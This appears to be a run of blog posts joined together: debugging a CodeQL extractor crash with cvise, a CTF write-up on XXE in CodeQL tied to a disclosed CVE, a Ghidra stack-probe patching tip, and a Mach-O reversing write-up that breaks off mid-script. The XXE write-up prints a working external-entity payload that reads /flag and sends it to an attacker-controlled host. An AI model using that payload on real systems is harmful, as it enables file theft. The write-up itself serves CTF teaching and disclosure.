Recently, a colleague was trying to create a CodeQL database for a specific version of the monad project to perform some security analysis.
Everything seemed to work fine during the database creation process. The build succeeded, CodeQL didn’t report any errors, and the database was created successfully.
However, when trying to query the database, something was clearly wrong.
My colleague wanted to find a specific class in the database. Even a simple query to select everything that has a location in a specific folder failed to return any results:
import cpp
from Element e
where e.getLocation().getFile().getAbsolutePath().matches("%transaction%")
select e
This should have returned a few results, but instead returned nothing. Something was clearly broken with the database.
When CodeQL database creation fails silently like this, the first thing to check is the build tracer log. This log contains detailed information about what happened during the build process and can reveal issues that aren’t immediately obvious.
The build tracer log is located at $DB/log/build-tracer.log inside your CodeQL database directory.
If we open this file and scroll through it, we notice something alarming: many “catastrophic errors”.
[T 00:45:26 93] CodeQL CLI version 2.23.2
[T 00:45:26 93] Initializing tracer.
...
64 errors and 1 catastrophic error detected in the compilation of "/app/monad/category/execution/ethereum/core/transaction.cpp".
The log shows many traced compilations, but also 129 catastrophic errors detected during compilation! If a compilation unit fails catastrophically, the extractor cannot extract any information from it, which explains why our queries returned no results.
To find what caused the catastrophic error, we need to scroll up a bit from where we see the catastrophic failures and look for actual error messages.
After scrolling through the build tracer log, we eventually find error messages that look like this:
error: assertion failed at: "decls.c", line 18401 in add_src_seq_end_of_variable_if_needed
This is the smoking gun! The CodeQL C/C++ extractor is hitting an internal assertion failure when processing certain source files1. When this happens, the extractor fails to extract any information from that compilation unit, which explains why our queries returned no results.
The error points to a specific file (decls.c) and line number (18401) in the CodeQL extractor’s internal code where an assertion failed. While we can’t fix the extractor directly, we can create a minimal reproducer to report the bug to the CodeQL team.
When reporting bugs to the CodeQL team (or any compiler/static analysis tool team), providing a minimal reproducer is incredibly valuable. Instead of asking them to clone and build the entire monad project, we can use a tool called cvise (or its predecessor, C-Reduce) to automatically reduce our failing test case to a minimal example.
cvise is a tool for reducing C/C++ programs. It takes a large program that triggers a bug and automatically removes code while ensuring the bug still reproduces. The result is a minimal test case that’s much easier to understand and debug.
I cannot recommend cvise enough for this purpose - it saved me hours of manual reduction work!
Whether you’re dealing with compiler crashes, static analysis tool bugs, or any other C/C++ code issues, cvise is an invaluable tool in your debugging arsenal.
In many cases, it even works pretty well for non-C/C++ languages, such as JavaScript or Java, by treating them as plain text files and applying similar reduction strategies!
To use cvise, we need to create an “interestingness test” - a script that returns 0 (success) if the bug reproduces and non-zero (failure) if it doesn’t.
Here’s the interestingness test script we’ll use:
#!/bin/bash
set -e
cleanup() {
rm -rf "$mytmpdir"
}
trap cleanup EXIT
mytmpdir=$(mktemp -d 2>/dev/null || mktemp -d -t 'mytmpdir')
codeql database create "$mytmpdir" --language=cpp --command="/usr/lib/llvm-19/bin/clang -std=gnu++23 -c minimal.cpp" --overwrite
cat "$mytmpdir/log/build-tracer.log" | grep 'error: assertion failed at: "decls.c", line 18401 in add_src_seq_end_of_variable_if_needed'
status=$?
exit $status
This script:
minimal.cpp with the same compiler and flags used in the original buildBefore we can run cvise, we need to identify which source file is causing the problem. We can grep through the build tracer log for the error message and look at the preceding compilation commands to find the problematic file.
Once we’ve identified the file, we copy it to minimal.cpp and verify that our interestingness test works:
cp /path/to/monad/consensus/problematic_file.cpp minimal.cpp
chmod +x test.sh
./test.sh
echo $? # should print 0
In our case, the log shows that the problematic file is from the GNU C++ standard library header alloc_traits.h, so we copy that file into minimal.cpp.
CodeQL C++ extractor: Current location: /app/monad/category/vm/core/assert.cpp:62055,3
CodeQL C++ extractor: Current physical location: /usr/lib/gcc/x86_64-linux-gnu/15/../../../../include/c++/15/bits/alloc_traits.h:146,3
"/usr/lib/gcc/x86_64-linux-gnu/15/../../../../include/c++/15/bits/alloc_traits.h", line 146: internal error: assertion failed at: "decls.c", line 18401 in add_src_seq_end_of_variable_if_needed
};
^
Now we can run cvise to reduce the file:
cvise --n 8 test.sh minimal.cpp
The --n 8 flag tells cvise to use 8 parallel processes to speed up the reduction.
cvise will now automatically try removing various parts of the code - functions, statements, expressions, type qualifiers, and more - while continuously checking that the bug still reproduces. This process can take anywhere from a few minutes to several hours depending on the size of the original file.
During the reduction process, cvise will:
At each step, it runs our interestingness test to verify the bug still reproduces. If a transformation causes the bug to disappear, it’s reverted. If the bug still reproduces, the transformation is kept.
After cvise finishes, we’ll have a minimal.cpp file that might look something like this:
struct __allocator_traits_base {
template < typename >
static constexpr int __can_construct_at{
# 1
};
};
This is much simpler than the original thousands of lines of code, but it still triggers the same assertion failure in the CodeQL extractor!
Now that we have a minimal reproducer, we can create a bug report for the CodeQL team. The report should include:
minimal.cpp fileWith this information, the CodeQL team can quickly reproduce the issue, debug it, and create a fix.
When CodeQL database creation appears to succeed but queries return no results:
codeql-db/log/build-tracer.logBy following this process, you can turn a frustrating debugging experience into a valuable bug report that helps improve CodeQL for everyone.
The bug has been fixed after just 9 days and released in CodeQL CLI version 2.23.5!
# syntax=docker/dockerfile:1-labs
FROM ubuntu:25.04 AS base
RUN apt update && apt upgrade -y
RUN apt update && apt install -y apt-utils
RUN apt update && apt install -y dialog
RUN apt update && apt install -y \
ca-certificates \
curl \
gnupg \
software-properties-common \
wget \
git
RUN apt update && apt install -y \
clang-19 \
gcc-15 \
g++-15
RUN apt update && apt install -y \
libarchive-dev \
libbrotli-dev \
libcap-dev \
libcli11-dev \
libgmp-dev \
libtbb-dev \
libzstd-dev
RUN git clone https://github.com/category-labs/monad/ /monad && \
cd monad && git checkout 3f1f0063468e04f48ff068d388167af1c4ab5635 && \
cp /monad/scripts/ubuntu-build/* /opt/ && rm -rf /monad
RUN /opt/install-boost.sh
RUN /opt/install-tools.sh
RUN /opt/install-deps.sh
FROM base AS codeql
WORKDIR /app
RUN apt install -y unzip libstdc++-15-dev
# Change to v2.23.5 (fixed) or v2.23.3 (broken) to test different versions
RUN curl -LO "https://github.com/github/codeql-cli-binaries/releases/download/v2.23.3/codeql-linux64.zip"
RUN unzip codeql-linux64.zip && rm codeql-linux64.zip
ENV PATH="/app/codeql:$PATH"
ENV ASMFLAGS=-march=haswell
ENV CFLAGS=-march=haswell
ENV CXXFLAGS=-march=haswell
RUN git clone --recursive https://github.com/category-labs/monad/ && cd monad && git checkout 3f1f0063468e04f48ff068d388167af1c4ab5635 && mkdir build
WORKDIR /app/monad
RUN cmake -S . -B build/ -DCMAKE_C_COMPILER=/usr/bin/clang-19 -DCMAKE_CXX_COMPILER=/usr/bin/clang++-19
RUN codeql database create codeql-db/ --language=cpp --command="cmake --build build/ --target monad -- -j" --overwrite
Why does this only happen when CodeQL “compiles” the code? The CodeQL C/C++ extractor intercepts the compilation process to extract additional information about the command line, macros, types, and so on. During this process, it runs its own compiler frontend that is based on EDG. This frontend is separate from the actual compiler used to build the code (e.g., Clang or GCC) and can have its own bugs and limitations. So even if the original code compiles fine with Clang or GCC, the CodeQL extractor might still hit bugs in its own frontend! ↩
TLDR: Nearly up-to-date (at the time) version of CodeQL and we have to extract the contents of a world-readable /flag file using XXE.
400 points and 8 solves.
Flag: rwctf{6ebfdb11-8e7f-493a-8bb2-d8623fd993bf}.
For this challenge, we are given an executable codeql_agent and a Dockerfile that downloads the CodeQL bundle version 2.15.5.
Our only means of interaction with the remote system is through this agent, written in Rust. Using this binary, a git repository containing a CodeQL database can be cloned and then we are allowed to execute (multiple) arbitrary CodeQL queries against it.
To obtain the flag file, we therefore have to find a (probably arbitrary) file read in CodeQL, which either emits the file contents to stdout/stderr or sends them off to a remote host.
I’ll first show the intended solution, my unintended solution, and then how to find the vulnerability using CodeQL.
If we open the binary in Ghidra, we are greeted with (Rust) pain:

So maybe let’s just run it and see what it does.
After starting the driver program, we are first asked for our username.
Unfortunately, we cannot introduce any special characters into it and so this is not (unintentionally) exploitable.
After that, we can ask the program to clone a given URL using git clone.
So far, no reversing was actually needed, but as we were initially unable to clone a git repository we had to look at the Rust code…
Trying to follow the flow from the entry point is pretty hard due to Rust and the usage of tokio. Instead we simply searched in Ghidra for the error string:
Invalid Git URL. Please try again.
Which brings us here:

And after clicking on the first XREF, we get this nice code:

The code checks whether the url has at least 8 characters and starts with http://. The starts with check is implemented by XORing with 0x2f2f3a70 (which is equivalent to //:p) and 0x70747468 (which is equivalent to ptth).
So a valid URL would, for example, be http://internal.internal/foo.git.
After that, we can write arbitrary CodeQL which is then executed as a query.
By either looking at the strings in Ghidra or by observing the started programs, we realize that CodeQL is started in a slightly unusual way:
codeql query run -d <DB_PATH> <QUERY_PATH> -J-Djavax.xml.accessExternalDTD=all
The JVM option -Djavax.xml.accessExternalDTD=all immediately hints towards the next step being to look at XML/XXE.
The intended solution is to perform XXE using the legacy .dbinfo file which is used by CodeQL to store information about the database and looks like this:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<ns2:dbinfo xmlns:ns2="https://semmle.com/schemas/dbinfo">
<sourceLocationPrefix>/opt/src</sourceLocationPrefix>
<unicodeNewlines>false</unicodeNewlines>
<columnKind>utf16</columnKind>
</ns2:dbinfo>
CodeQL parses .dbinfo files using the com.semmle.util.db.DbInfo class which uses their XML class to parse the XML file:
// simplified from `readXmlDbInfo`
String dbInfoPath = "PATH/TO/.dbinfo";
InputStream input = Files.newInputStream(dbInfoPath);
DbInfo dbInfo = XML.read(null, DbInfo.class, dbInfoPath.toString(), new StreamSource(input));
XML.read ultimately uses javax.xml.bind.Unmarshaller to parse the XML file:
public static <T> T read(Schema schema, Class<T> type, String sourceName, StreamSource source) {
Unmarshaller unmarshaller = getContext(type).createUnmarshaller();
unmarshaller.setSchema(schema);
return unmarshaller.unmarshal(source, type).getValue();
}
The javax.xml.bind.Unmarshaller class is part of the Java API for XML Binding (JAXB), which is not vulnerable to XXE by default in newer versions 1, as far as I know. So if we run this simplified code that uses javax.xml.bind.Unmarshaller to parse an XML file with XXE, it will not work:
public class Main {
public static void main(String[] args) throws Exception {
String xxeString = "<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///flag\">]><foo>&xxe;</foo>";
InputStream input = new ByteArrayInputStream(xxeString.getBytes("UTF-8"));
JAXBContext context = JAXBContext.newInstance(String.class);
Unmarshaller unmarshaller = context.createUnmarshaller();
System.out.println(unmarshaller.unmarshal(new StreamSource(input), String.class).getValue());
}
}
and fail with an exception:
javax.xml.bind.UnmarshalException
at [SNIP]
Caused by: org.xml.sax.SAXParseException: External Entity: Failed to read external document 'flag', because 'file' access is not allowed due to restriction set by the accessExternalDTD property.
at [SNIP]
at com.example.Main.main (Main.java:18)
If we run the same code with the -Djavax.xml.accessExternalDTD=all JVM option, it will work and print the contents of the /flag file:
rwctf{fake_flag}
For a full exploit, we’d replace a .dbinfo file in an existing (old) CodeQL database with this XXE payload:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE foobar SYSTEM "https://requestbin.internal/dQw4w9WgXcQ">
where the https://requestbin.internal/dQw4w9WgXcQ URL is a requestbin URL that we control and that returns this content:
<!ENTITY % file SYSTEM "file:///flag">
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'https://requestbin.internal/dQw4w9WgXc/%file;'>">
%eval;
%exfil;
We then only have to host the DB somewhere in a Git repository and tell the “codeql_agent” to run a CodeQL query on that database.
After a while, we will see a request to our requestbin URL with the contents of the /flag file:
https://requestbin.internal/dQw4w9WgXc/rwctf{6ebfdb11-8e7f-493a-8bb2-d8623fd993bf}
The unintended solution is to use the semmlecode.dbscheme.stats file which is used to improve join-ordering decisions in CodeQL. This solution is unintended, because it works with the default JVM settings and does not require the -Djavax.xml.accessExternalDTD=all JVM option. We therefore responsibly disclosed this vulnerability to GitHub and it was assigned CVE-2024-25129.
We knew that we had to find a place where CodeQL parsed XML and so we set out to find all places where the CodeQL Java program parsed XML. To do this, we first set up a comfy development environment.
As CodeQL is a nice, unobfuscated Java program, we just make a small project in IntelliJ and attach the CodeQL JAR file as a library. This allows us to write code calling CodeQL methods but, more importantly, also to use IntelliJ’s remote debugging feature for dynamic analysis. To find all XML parsing locations, we then insert breakpoints at the JAXP entrypoints and run the program.
Very soon, a few breakpoints triggered—parsing the logback configuration included in the CodeQL JAR file. Not exactly a prime target. Sadly, this was all we could gather at this stage; no other places jumped out that parse XML using the JAXP entrypoints. But we also noticed another place parsing XML, even though it did not seem to hit the normal JAXB methods: The database statistics file (this file is used to improve join-ordering decisions). Unfortunately, it seems to be loaded from the integrated definitions within CodeQL and therefore not controllable by us.
Through trial and error, we finally move a dbstats file (db-java/semmlecode.dbscheme.stats) in the database, changing its path and suddenly running a query crashes with a file-not-found exception. Tracing the callstack with the provided error message reveals a second XML parser, Apache Xerces (this is Java after all)! After experimenting for a bit, we confirm that the XML in the statistics file is actually parsed by CodeQL (using the StatisticsPersistence class) — XML written by us.
We can now just reuse the XXE payload from the intended solution and host the dbstats file in a Git repository. After running a query, we will once again see a request to our requestbin URL with the contents of the /flag file.
In real life, this vulnerability is unfortunately quite limited as (at least) Java does not allow newlines in URLs, making exfiltration of multi-line files impossible.
However, XXE can still be used for RCE when the stars align as the watchTowr team has shown in their recent blog post.
The GitHub security advisory for the unintended solution interestingly states this:
https://github.com/github/codeql/blob/main/java/ql/src/Security/CWE/CWE-611/XXELocal.ql is a CodeQL query that would have found this vulnerability. It is usually disabled because a high risk of false positives. Java projects that know they will never need to parse XML that depends on document-provided DTDs may want to enable it in their own CodeQL analysis.
So let’s try this and see if we can find the XXE in CodeQL using CodeQL. (Spoiler alert: it’s not that easy)
If you click on the link in the advisory, you’ll be greeted with a 404 2. This is because CodeQL recently introduced Threat Models.
Threat Models are a new way to tell CodeQL our well - threat model. Is our code accessible to local attackers that might be able to write files to our disk? Or is it accessible to remote attackers? In essence, Threat Models tell CodeQL what we do care about and what we don’t care about. This is important because CodeQL is a general-purpose tool and can be used for many different things. For example, if we are analyzing a web application, we might not care about local attacks at all and only want to find remote attacks.
So instead of having one query that finds local XXE and one that finds remote XXE, we now have a single query that finds XXE and we tell CodeQL whether we care about local or remote attacks.
We had to decompile the CodeQL jar file to get the source code when we were trying to find a solution to the challenge. Now we can use this decompiled source code to create a CodeQL database and analyze it.
Luckily for us, CodeQL recently added a new feature called Buildless Mode which allows us to create a CodeQL database from source code without being able to build the project. This is especially useful for decompiled code where we might not have all the dependencies.
We can use the following command to create a CodeQL database from the decompiled CodeQL source code:
codeql database create --language=java ../codeql_db --build-mode=none
Now that we have a CodeQL database, we can run the XXE query on it like this:
codeql database analyze PATH_TO_DB PATH_TO_ql/java/ql/src/Security/CWE/CWE-611/XXE.ql --threat-model local --output=output.sarif --format=sarif-latest --rerun
The query will find only one result in the CodeQL source code: the StAXXmlPopulator.java file, which is a false-positive because all entities are only resolved to dummy values.
So where is the XXE in the StatisticsPersistence class?
The XXE.ql query looks like this:
import java
import semmle.code.java.dataflow.DataFlow
import semmle.code.java.security.XxeRemoteQuery
import XxeFlow::PathGraph
from XxeFlow::PathNode source, XxeFlow::PathNode sink
where XxeFlow::flowPath(source, sink)
select sink.getNode(), source, sink,
"XML parsing depends on a $@ without guarding against external entity expansion.",
source.getNode(), "user-provided value"
If we want to debug this, we have to make a few changes:
module XxeFlowPartial = XxeFlow::FlowExplorationRev<explorationLimit/0>; for performing reverse data flow analysis.int explorationLimit() { result = 3; } for limiting the exploration depth to 3.flowPath predicate to XxeFlowPartial::partialFlow(source, sink, _)XxeFlow::PathGraph to XxeFlowPartial::PartialPathGraph.XxeFlow::PathNode to XxeFlowPartial::PartialPathNode.flowPath predicate to only match the StatisticsPersistence class: sink.getLocation().getFile().getAbsolutePath().matches("%StatisticsPersistence%")If we now run the modified query and tweak the exploration limit a bit, we can see that the StatisticsPersistence class is not reachable from a source node.
This is because only a few classes are currently modeled for the file (included in local) threat model.
Crucially, the java.nio.file.Files.newBufferedReader method is not modeled at all.
If we go to our checkout of ql/java/ql/lib/ext/java.nio.file.model.yml and add the following lines:
- addsTo:
pack: codeql/java-all
extensible: sourceModel
data:
- [
"java.nio.file",
"Files",
True,
"newBufferedReader",
"",
"",
"ReturnValue",
"file",
"manual",
]
and run the original query again, we can now see the StatisticsPersistence class in the results:

This is exactly the flow that we used in the unintended solution.
If we were to run the same query on the patched version of CodeQL, we would see that the StatisticsPersistence class is not vulnerable anymore, because the XML parser is now configured to not allow external entities.
In this writeup, we have shown how to solve the RealworldCTF 2024 challenge “Protected-by-Java-SE” using XXE in CodeQL both the intended and unintended way.
We also showed how to find the XXE vulnerability in CodeQL using CodeQL itself :D
For that, we used Buildless Mode to work with decompiled code, used the new Threat Models feature, and looked at how to debug a dataflow query using partial forward/reverse dataflow analysis.
Ultimately, this challenge shows that even well-designed security software can still be vulnerable.
]]>I was playing DEFCON CTF Quals 2025 with (KITCTF⊂Sauercloud) and I looked into the callmerust challenge.
The actual challenge is not relevant for this post, but when opening the binary in Ghidra (or binja) 1, I was greeted with some very ugly decompilation output.
The decompilation output looks ugly, because Ghidra is unable to track the stack pointer correctly.
This is because the binary is compiled with -fstack-check (or similar), which adds stack probing code to the binary.
Luckily, there is a very simple fix for this issue.
On Linux, the stack grows automatically when more stack space is needed. This is done by allocating a guard page at the start of the stack, which is a page of memory that is not accessible to the program. When the program tries to access this page, it will cause a segmentation fault, which causes the kernel to grow the stack by allocating a new page of memory.
However, this automatic expansion can lead to a stack clash attack, where an attacker can exploit the fact that the stack grows downwards and the heap grows upwards. This can lead to a situation where the stack and heap collide, leading to a stack overflow or heap corruption.
All an attacker needs to do is to “jump” over the guard page (usually 0x1000 bytes), that is, move the stack pointer to a location that is below the guard page without reading/writing it.
To prevent this, the compiler adds stack probing code to the binary, which probes the stack before moving the stack pointer by more than 0x1000 bytes. This ensures that the guard page cannot be jumped over.
For a deeper dive into stack clash vulnerabilities and mitigations, you can refer to the Qualys blog post on Stack Clash.
The problem with stack probing is that it breaks the stack pointer tracking in Ghidra (and binja).
Let’s consider a very simple example:
#include <stdio.h>
struct bar
{
int a;
int b;
long long c;
};
int main()
{
char foao[0x5000];
int foo = 22;
struct bar bar = {1, 23, 4};
int z3 = foo + bar.b;
puts("Hello");
printf("z3: %d", z3);
}
This code is very simple, but it has a stack probe in it. The stack probe is added because the stack frame is larger than 0x1000 bytes (the size of the guard page).
When compiled with -fstack-check, the compiler will add a stack probe to the binary.
When opening the binary in Ghidra, we can see that the stack pointer tracking is broken.
The stack pointer is not tracked correctly, and the decompilation output is very ugly (notice the (puVar2 + -0x28) = ... in the decompilation output):
undefined8 main(void)
{
undefined1 *puVar1;
undefined1 *puVar2;
ulong uVar3;
undefined1 local_6008 [4064];
undefined4 local_5028;
undefined4 local_5024;
undefined8 local_5020;
uint local_10;
undefined4 local_c;
puVar1 = &stack0xfffffffffffffff8;
do {
puVar2 = puVar1;
*(undefined8 *)(puVar2 + -0x1000) = *(undefined8 *)(puVar2 + -0x1000);
puVar1 = puVar2 + -0x1000;
} while (puVar2 + -0x1000 != local_6008);
*(undefined8 *)(puVar2 + -0x1040) = *(undefined8 *)(puVar2 + -0x1040);
local_c = 0x16;
local_5028 = 1;
local_5024 = 0x17;
local_5020 = 4;
local_10 = 0x2d;
*(undefined8 *)(puVar2 + -0x28) = 0x1011b9;
puts("Hello");
uVar3 = (ulong)local_10;
*(undefined8 *)(puVar2 + -0x28) = 0x1011d2;
printf("z3: %d",uVar3);
return 0;
}
The stack probing code looks like this:
0000000000001149 <main>:
1149: 55 push rbp
114a: 48 89 e5 mov rbp,rsp
114d: 4c 8d 9c 24 00 a0 ff lea r11,[rsp-0x6000]
1154: ff
1155: 48 81 ec 00 10 00 00 sub rsp,0x1000 <-- change stack pointer
115c: 48 83 0c 24 00 or QWORD PTR [rsp],0x0 <-- stack probe
1161: 4c 39 dc cmp rsp,r11
1164: 75 ef jne 1155 <main+0xc> <--loop
Ghidra is likely unable to track the stack pointer correctly, because the stack pointer is moved in a loop. (I have opened an issue on the Ghidra GitHub repository 2 and Binary Ninja GitHub repository 3)
The fix for this issue is very simple. We just have to apply some manual analysis and patch a few instructions in the binary.
Patching in Ghidra is very simple. We can just right-click on the instruction and select “Patch Instruction” and watch the Ghidra dragon munch some bytes while constructing the assembler 😂

To improve the decompilation, we can replace the sub rsp,0x1000 (in the stack probing code) simply with a sub rsp,0x6000 instruction, because that is what the loop does in the end.
Then we only have to replace the loop instruction (jne 1155 <main+0xc>) with a nop instruction, because the loop is not necessary anymore.
This is a very simple fix, but it makes the decompilation output much better!
When opening the patched binary in Ghidra, we can see that the stack pointer tracking is now correct and the decompilation output is much better:
undefined8 main(void)
{
puts("Hello");
printf("z3: %d",0x2d);
return 0;
}
So by manually patching the binary to simplify stack pointer adjustments and removing unnecessary loops, we can significantly improve the clarity of the decompiled code until this issue is fixed in Ghidra.
Only IDA tracks the stack pointer correctly, but it has different issues with for example strings (see the binary in dogbolt). ↩
https://github.com/NationalSecurityAgency/ghidra/issues/8017 ↩
TLDR: Hidden code in Mach-O load commands and a bit of anti-debugging.
400 points and 2 solves.
Flag: brck{Y0U_M4cho_C0mm4ndr}.
For this challenge, we are given a single extensionless file command_injection.
If we run file on it, we quickly realize that it is a Mach-O binary:
$ file command_injection
command_injection: Mach-O 64-bit x86_64 executable, flags:<NOUNDEFS>
We are given a binary, so we can just open it in Ghidra and see what it does, right?
Right?
Well, not quite.
When we import the binary as a Mach-O binary in Ghidra, we are greeted with this message:
Attempted to read string at 0xfffffffff050f826
java.io.EOFException: Attempted to read string at 0xfffffffff050f826
at ghidra.app.util.bin.BinaryReader.readUntilNullTerm(BinaryReader.java:716)
at ghidra.app.util.bin.BinaryReader.readString(BinaryReader.java:874)
at ghidra.app.util.bin.BinaryReader.readAsciiString(BinaryReader.java:759)
at ghidra.app.util.bin.format.macho.commands.LoadCommandString.<init>(LoadCommandString.java:37)
at ghidra.app.util.bin.format.macho.commands.SubFrameworkCommand.<init>(SubFrameworkCommand.java:39)
at ghidra.app.util.bin.format.macho.commands.LoadCommandFactory.getLoadCommand(LoadCommandFactory.java:90)
at ghidra.app.util.bin.format.macho.MachHeader.parse(MachHeader.java:188)
at ghidra.app.util.bin.format.macho.MachHeader.parse(MachHeader.java:150)
at ghidra.app.util.opinion.MachoProgramBuilder.build(MachoProgramBuilder.java:118)
at ghidra.app.util.opinion.MachoProgramBuilder.buildProgram(MachoProgramBuilder.java:110)
at ghidra.app.util.opinion.MachoLoader.load(MachoLoader.java:90)
at ghidra.app.util.opinion.AbstractLibrarySupportLoader.doLoad(AbstractLibrarySupportLoader.java:883)
at ghidra.app.util.opinion.AbstractLibrarySupportLoader.loadProgram(AbstractLibrarySupportLoader.java:98)
at ghidra.app.util.opinion.AbstractProgramLoader.load(AbstractProgramLoader.java:131)
at ghidra.plugin.importer.ImporterUtilities.importSingleFile(ImporterUtilities.java:395)
at ghidra.plugin.importer.ImporterDialog.lambda$okCallback$7(ImporterDialog.java:336)
at ghidra.util.task.TaskBuilder$TaskBuilderTask.run(TaskBuilder.java:306)
at ghidra.util.task.Task.monitoredRun(Task.java:134)
at ghidra.util.task.TaskRunner.lambda$startTaskThread$0(TaskRunner.java:106)
at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)
at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
at java.base/java.lang.Thread.run(Thread.java:840)
:/
We can still import the binary as a raw binary, but we won’t get any symbols or function names and if we try to auto-analyze it, Ghidra will crash with the same exception.
What do we do when Ghidra fails us? We turn to a lower-level tool: ImHex. Luckily, ImHex already has a Mach-O pattern, so we can just open the binary and start analyzing it, right?
Right?
Well, not quite.
When we open the binary in ImHex, we are greeted with this message:

:/
While ImHex has an inbuilt debugger, I just uncommented the problematic pattern definition and reanalyzed the binary.
If we then look at the very first load command of type Command::UUID, we can see that the uuid field is not a valid UUID:

Normally, the Command::UUID consists of a 4-byte command field, a 4-byte commandSize field, and a 16-byte uuid field, so the commandSize should be 4 + 4 + 16 = 0x18, but it is 0x32.
ImHex only expects 0x18 bytes for the Command::UUID and then tries to parse the next load command, but the next load command is not at the expected offset.
We can easily fix this by changing the pattern definition from
if (command == Command::UUID)
CommandUUID data;
to
if (command == Command::UUID) {
CommandUUID data;
u8 ignored[commandSize - 8 - sizeof(CommandUUID)] [[sealed]];
}
If we now look at the load commands in the “Pattern Data” view, we can see that the next command — Command::Segment64 is now parsed correctly:

It is a __PAGEZERO segment that maps 3956 bytes starting at file offset 0x0 to virtual address 0x1000 with r-x permissions.
This is unusual, as __PAGEZERO is normally used to map the zero page 1, which is not executable and not writable.
With this information, we can now adjust the base address of the binary in both Ghidra and ImHex to 0x1000.
All other segments map exactly zero bytes, so they are not interesting.
However, we still don’t know where the entry point is, so we can’t start analyzing the binary.
As I write this, I now understand, that the entry point is determined by the LC_UNIXTHREAD command 2.
The LC_UNIXTHREAD command contains the full register state of the thread that is started when the binary is executed, including the instruction pointer (RIP) register, which points to the entry point of the binary.
As I had no way to run macOS binaries, I decided to (ab)use the macOS GitHub Actions runners to run the binary and see what it does :D
We create a new repository and add a new workflow file that uses the mxschmitt/action-tmate action.
This action starts a new tmate session and prints the SSH connection string to the log. We can then connect to the runner and add the binary by for example base64 decoding it.
After connecting to the runner, we can run the binary and see what it does.
$ ./command_injection
😕
Okay, now that we have a macOS runner, we can also use the otool command to analyze the binary.
$ otool -l command_injection
[...]
Load command 5
cmd LC_UNIXTHREAD
cmdsize 184
flavor x86_THREAD_STATE64
count x86_THREAD_STATE64_COUNT
rax 0x000000000200001a rbx 0x0000000000000000 rcx 0x0000000000000000
rdx 0x0000000000000000 rdi 0x000000000000001f rsi 0x0000000000000000
rbp 0x0000000000000000 rsp 0x0000000000000000 r8 0x0000000000000000
r9 0x0000000000000000 r10 0x0000000000000000 r11 0x0000000000000000
r12 0x0000000000000000 r13 0x0000000000000000 r14 0x0000000000000000
r15 0x0000000000000000 rip 0x00000000000017bd
rflags 0x0000000000000000 cs 0x0000000000000000 fs 0x0000000000000000
gs 0x0000000000000000
[...]
So 0x00000000000017bd is the entry point of the binary. However, I didn’t know at the time that the entry point is determined by LC_UNIXTHREAD.
So I tried to debug the binary with lldb:
$ lldb
(lldb) process launch --stop-at-entry -- command_injection
Process 5805 stopped
* thread #1, stop reason = signal SIGSTOP
frame #0: 0x00000000000017bd command_injection
-> 0x17bd: syscall
The binary stops at the entry point 🎉
However, it immediately exists when stepping over the syscall instruction.
Process 5805 exited with status = 45 (0x0000002d)
If we google for exited with status = 45 (0x0000002d) we find that this is an anti-debugging feature that is based on the ptrace system call 3.
We can easily bypass this by adjusting the entry point to the next instruction after the syscall instruction.
Now we can analyze the binary in lldb and all should be good, right?
Not really, tmate/tmux is painful-ish to use and I am not familiar with lldb and I didn’t want to learn it right now.
Instead, I figured that just emulating the binary with Unicorn would be easier and give me more control and insight into the binary.
Unicorn is a lightweight multi-platform, multi-architecture CPU emulator framework. It is very easy to use and has a Python binding, so we can easily write a script that emulates the binary and prints the instructions and register values.
However, we have to load the binary into memory and set up the initial register state ourselves, as we don’t have a loader that does this for us.
We set the entry point to 0x17bd + 2 because we want to skip the anti-debugging feature and the other registers to the values from the LC_UNIXTHREAD command.
Additionally, we have to set up the stack and the argv[0] variable.
The flag input is stored in argv[0], so we just let it point to an empty string.
Also, we add hooks for tracing all instructions and memory accesses, so we can see what the binary does as well as a hook for all cmp instructions.
The cmp instructions are used to check whether the flag is correct, by comparing the value in rax with the value in rdi.
The value of rax is rax ^ rcx, so if we want to know the correct flag, we just have to XOR the value in rdi with the value in rcx.
If we run the script once, we get the flag part brck{Y0U. If we add this to the flag input, and run the script again, we get the next part _M4cho_C. If we repeat this once more, we get the full flag:
brck{Y0U_M4cho_C0mm4ndr}
from unicorn import *
from unicorn.x86_const import *
from capstone import *
from capstone.x86 import *
# Initialize capstone disassembler
md = Cs(CS_ARCH_X86, CS_MODE_64)
from pwn import *
context.arch = "amd64"
# Memory address where emulation starts
ADDRESS = 0x1000
START_ADDRESS = 0x00000000000017BD + 2
STACK_START_ADDRESS = 0x7FFF_FF00_0000
STACK_SIZE = 1024 * 1024
STACK_END_ADDRESS = STACK_START_ADDRESS + STACK_SIZE
STACK_ADDRESS = STACK_START_ADDRESS + STACK_SIZE // 2
# Load binary
with open("command_injection_orig", "rb") as f:
binary = f.read()
# Initialize emulator in X86-64 mode
mu = Uc(UC_ARCH_X86, UC_MODE_64)
# Map 2MB memory for this emulation
mu.mem_map(ADDRESS, 2 * 1024 * 1024)
# Write binary to memory
mu.mem_write(ADDRESS, binary)
# Map 1MB stack memory
mu.mem_map(STACK_START_ADDRESS, STACK_SIZE)
# Initialize stack pointer
mu.reg_write(UC_X86_REG_RSP, STACK_ADDRESS)
# Initialize argv[0]
argv0 = [b""] # flag input
argv0.append(b"\x00") # Null-terminate the argv[0] list
# Write argv[0] to memory
argv_address = STACK_END_ADDRESS - 128 * 8 # Allocate space for argv on the stack
mu.mem_write(argv_address, argv0[0])
mu.mem_write(argv_address + len(argv0[0]), b"\x00")
mu.mem_write(
STACK_ADDRESS + 0x8, p64(argv_address)
) # Write the address of argv[0] to the stack
# Initialize registers
mu.reg_write(UC_X86_REG_RAX, 0x000000000200001A)
mu.reg_write(UC_X86_REG_RBX, 0x0000000000000000)
mu.reg_write(UC_X86_REG_RCX, 0x0000000000000000)
mu.reg_write(UC_X86_REG_RDX, 0x0000000000000000)
mu.reg_write(UC_X86_REG_RDI, 0x000000000000001F)
mu.reg_write(UC_X86_REG_RSI, 0x0000000000000000)
mu.reg_write(UC_X86_REG_RBP, 0x0000000000000000)
# mu.reg_write(UC_X86_REG_RSP, 0x0000000000000000)
mu.reg_write(UC_X86_REG_R8, 0x0000000000000000)
mu.reg_write(UC_X86_REG_R9, 0x0000000000000000)
mu.reg_write(UC_X86_REG_R10, 0x0000000000000000)
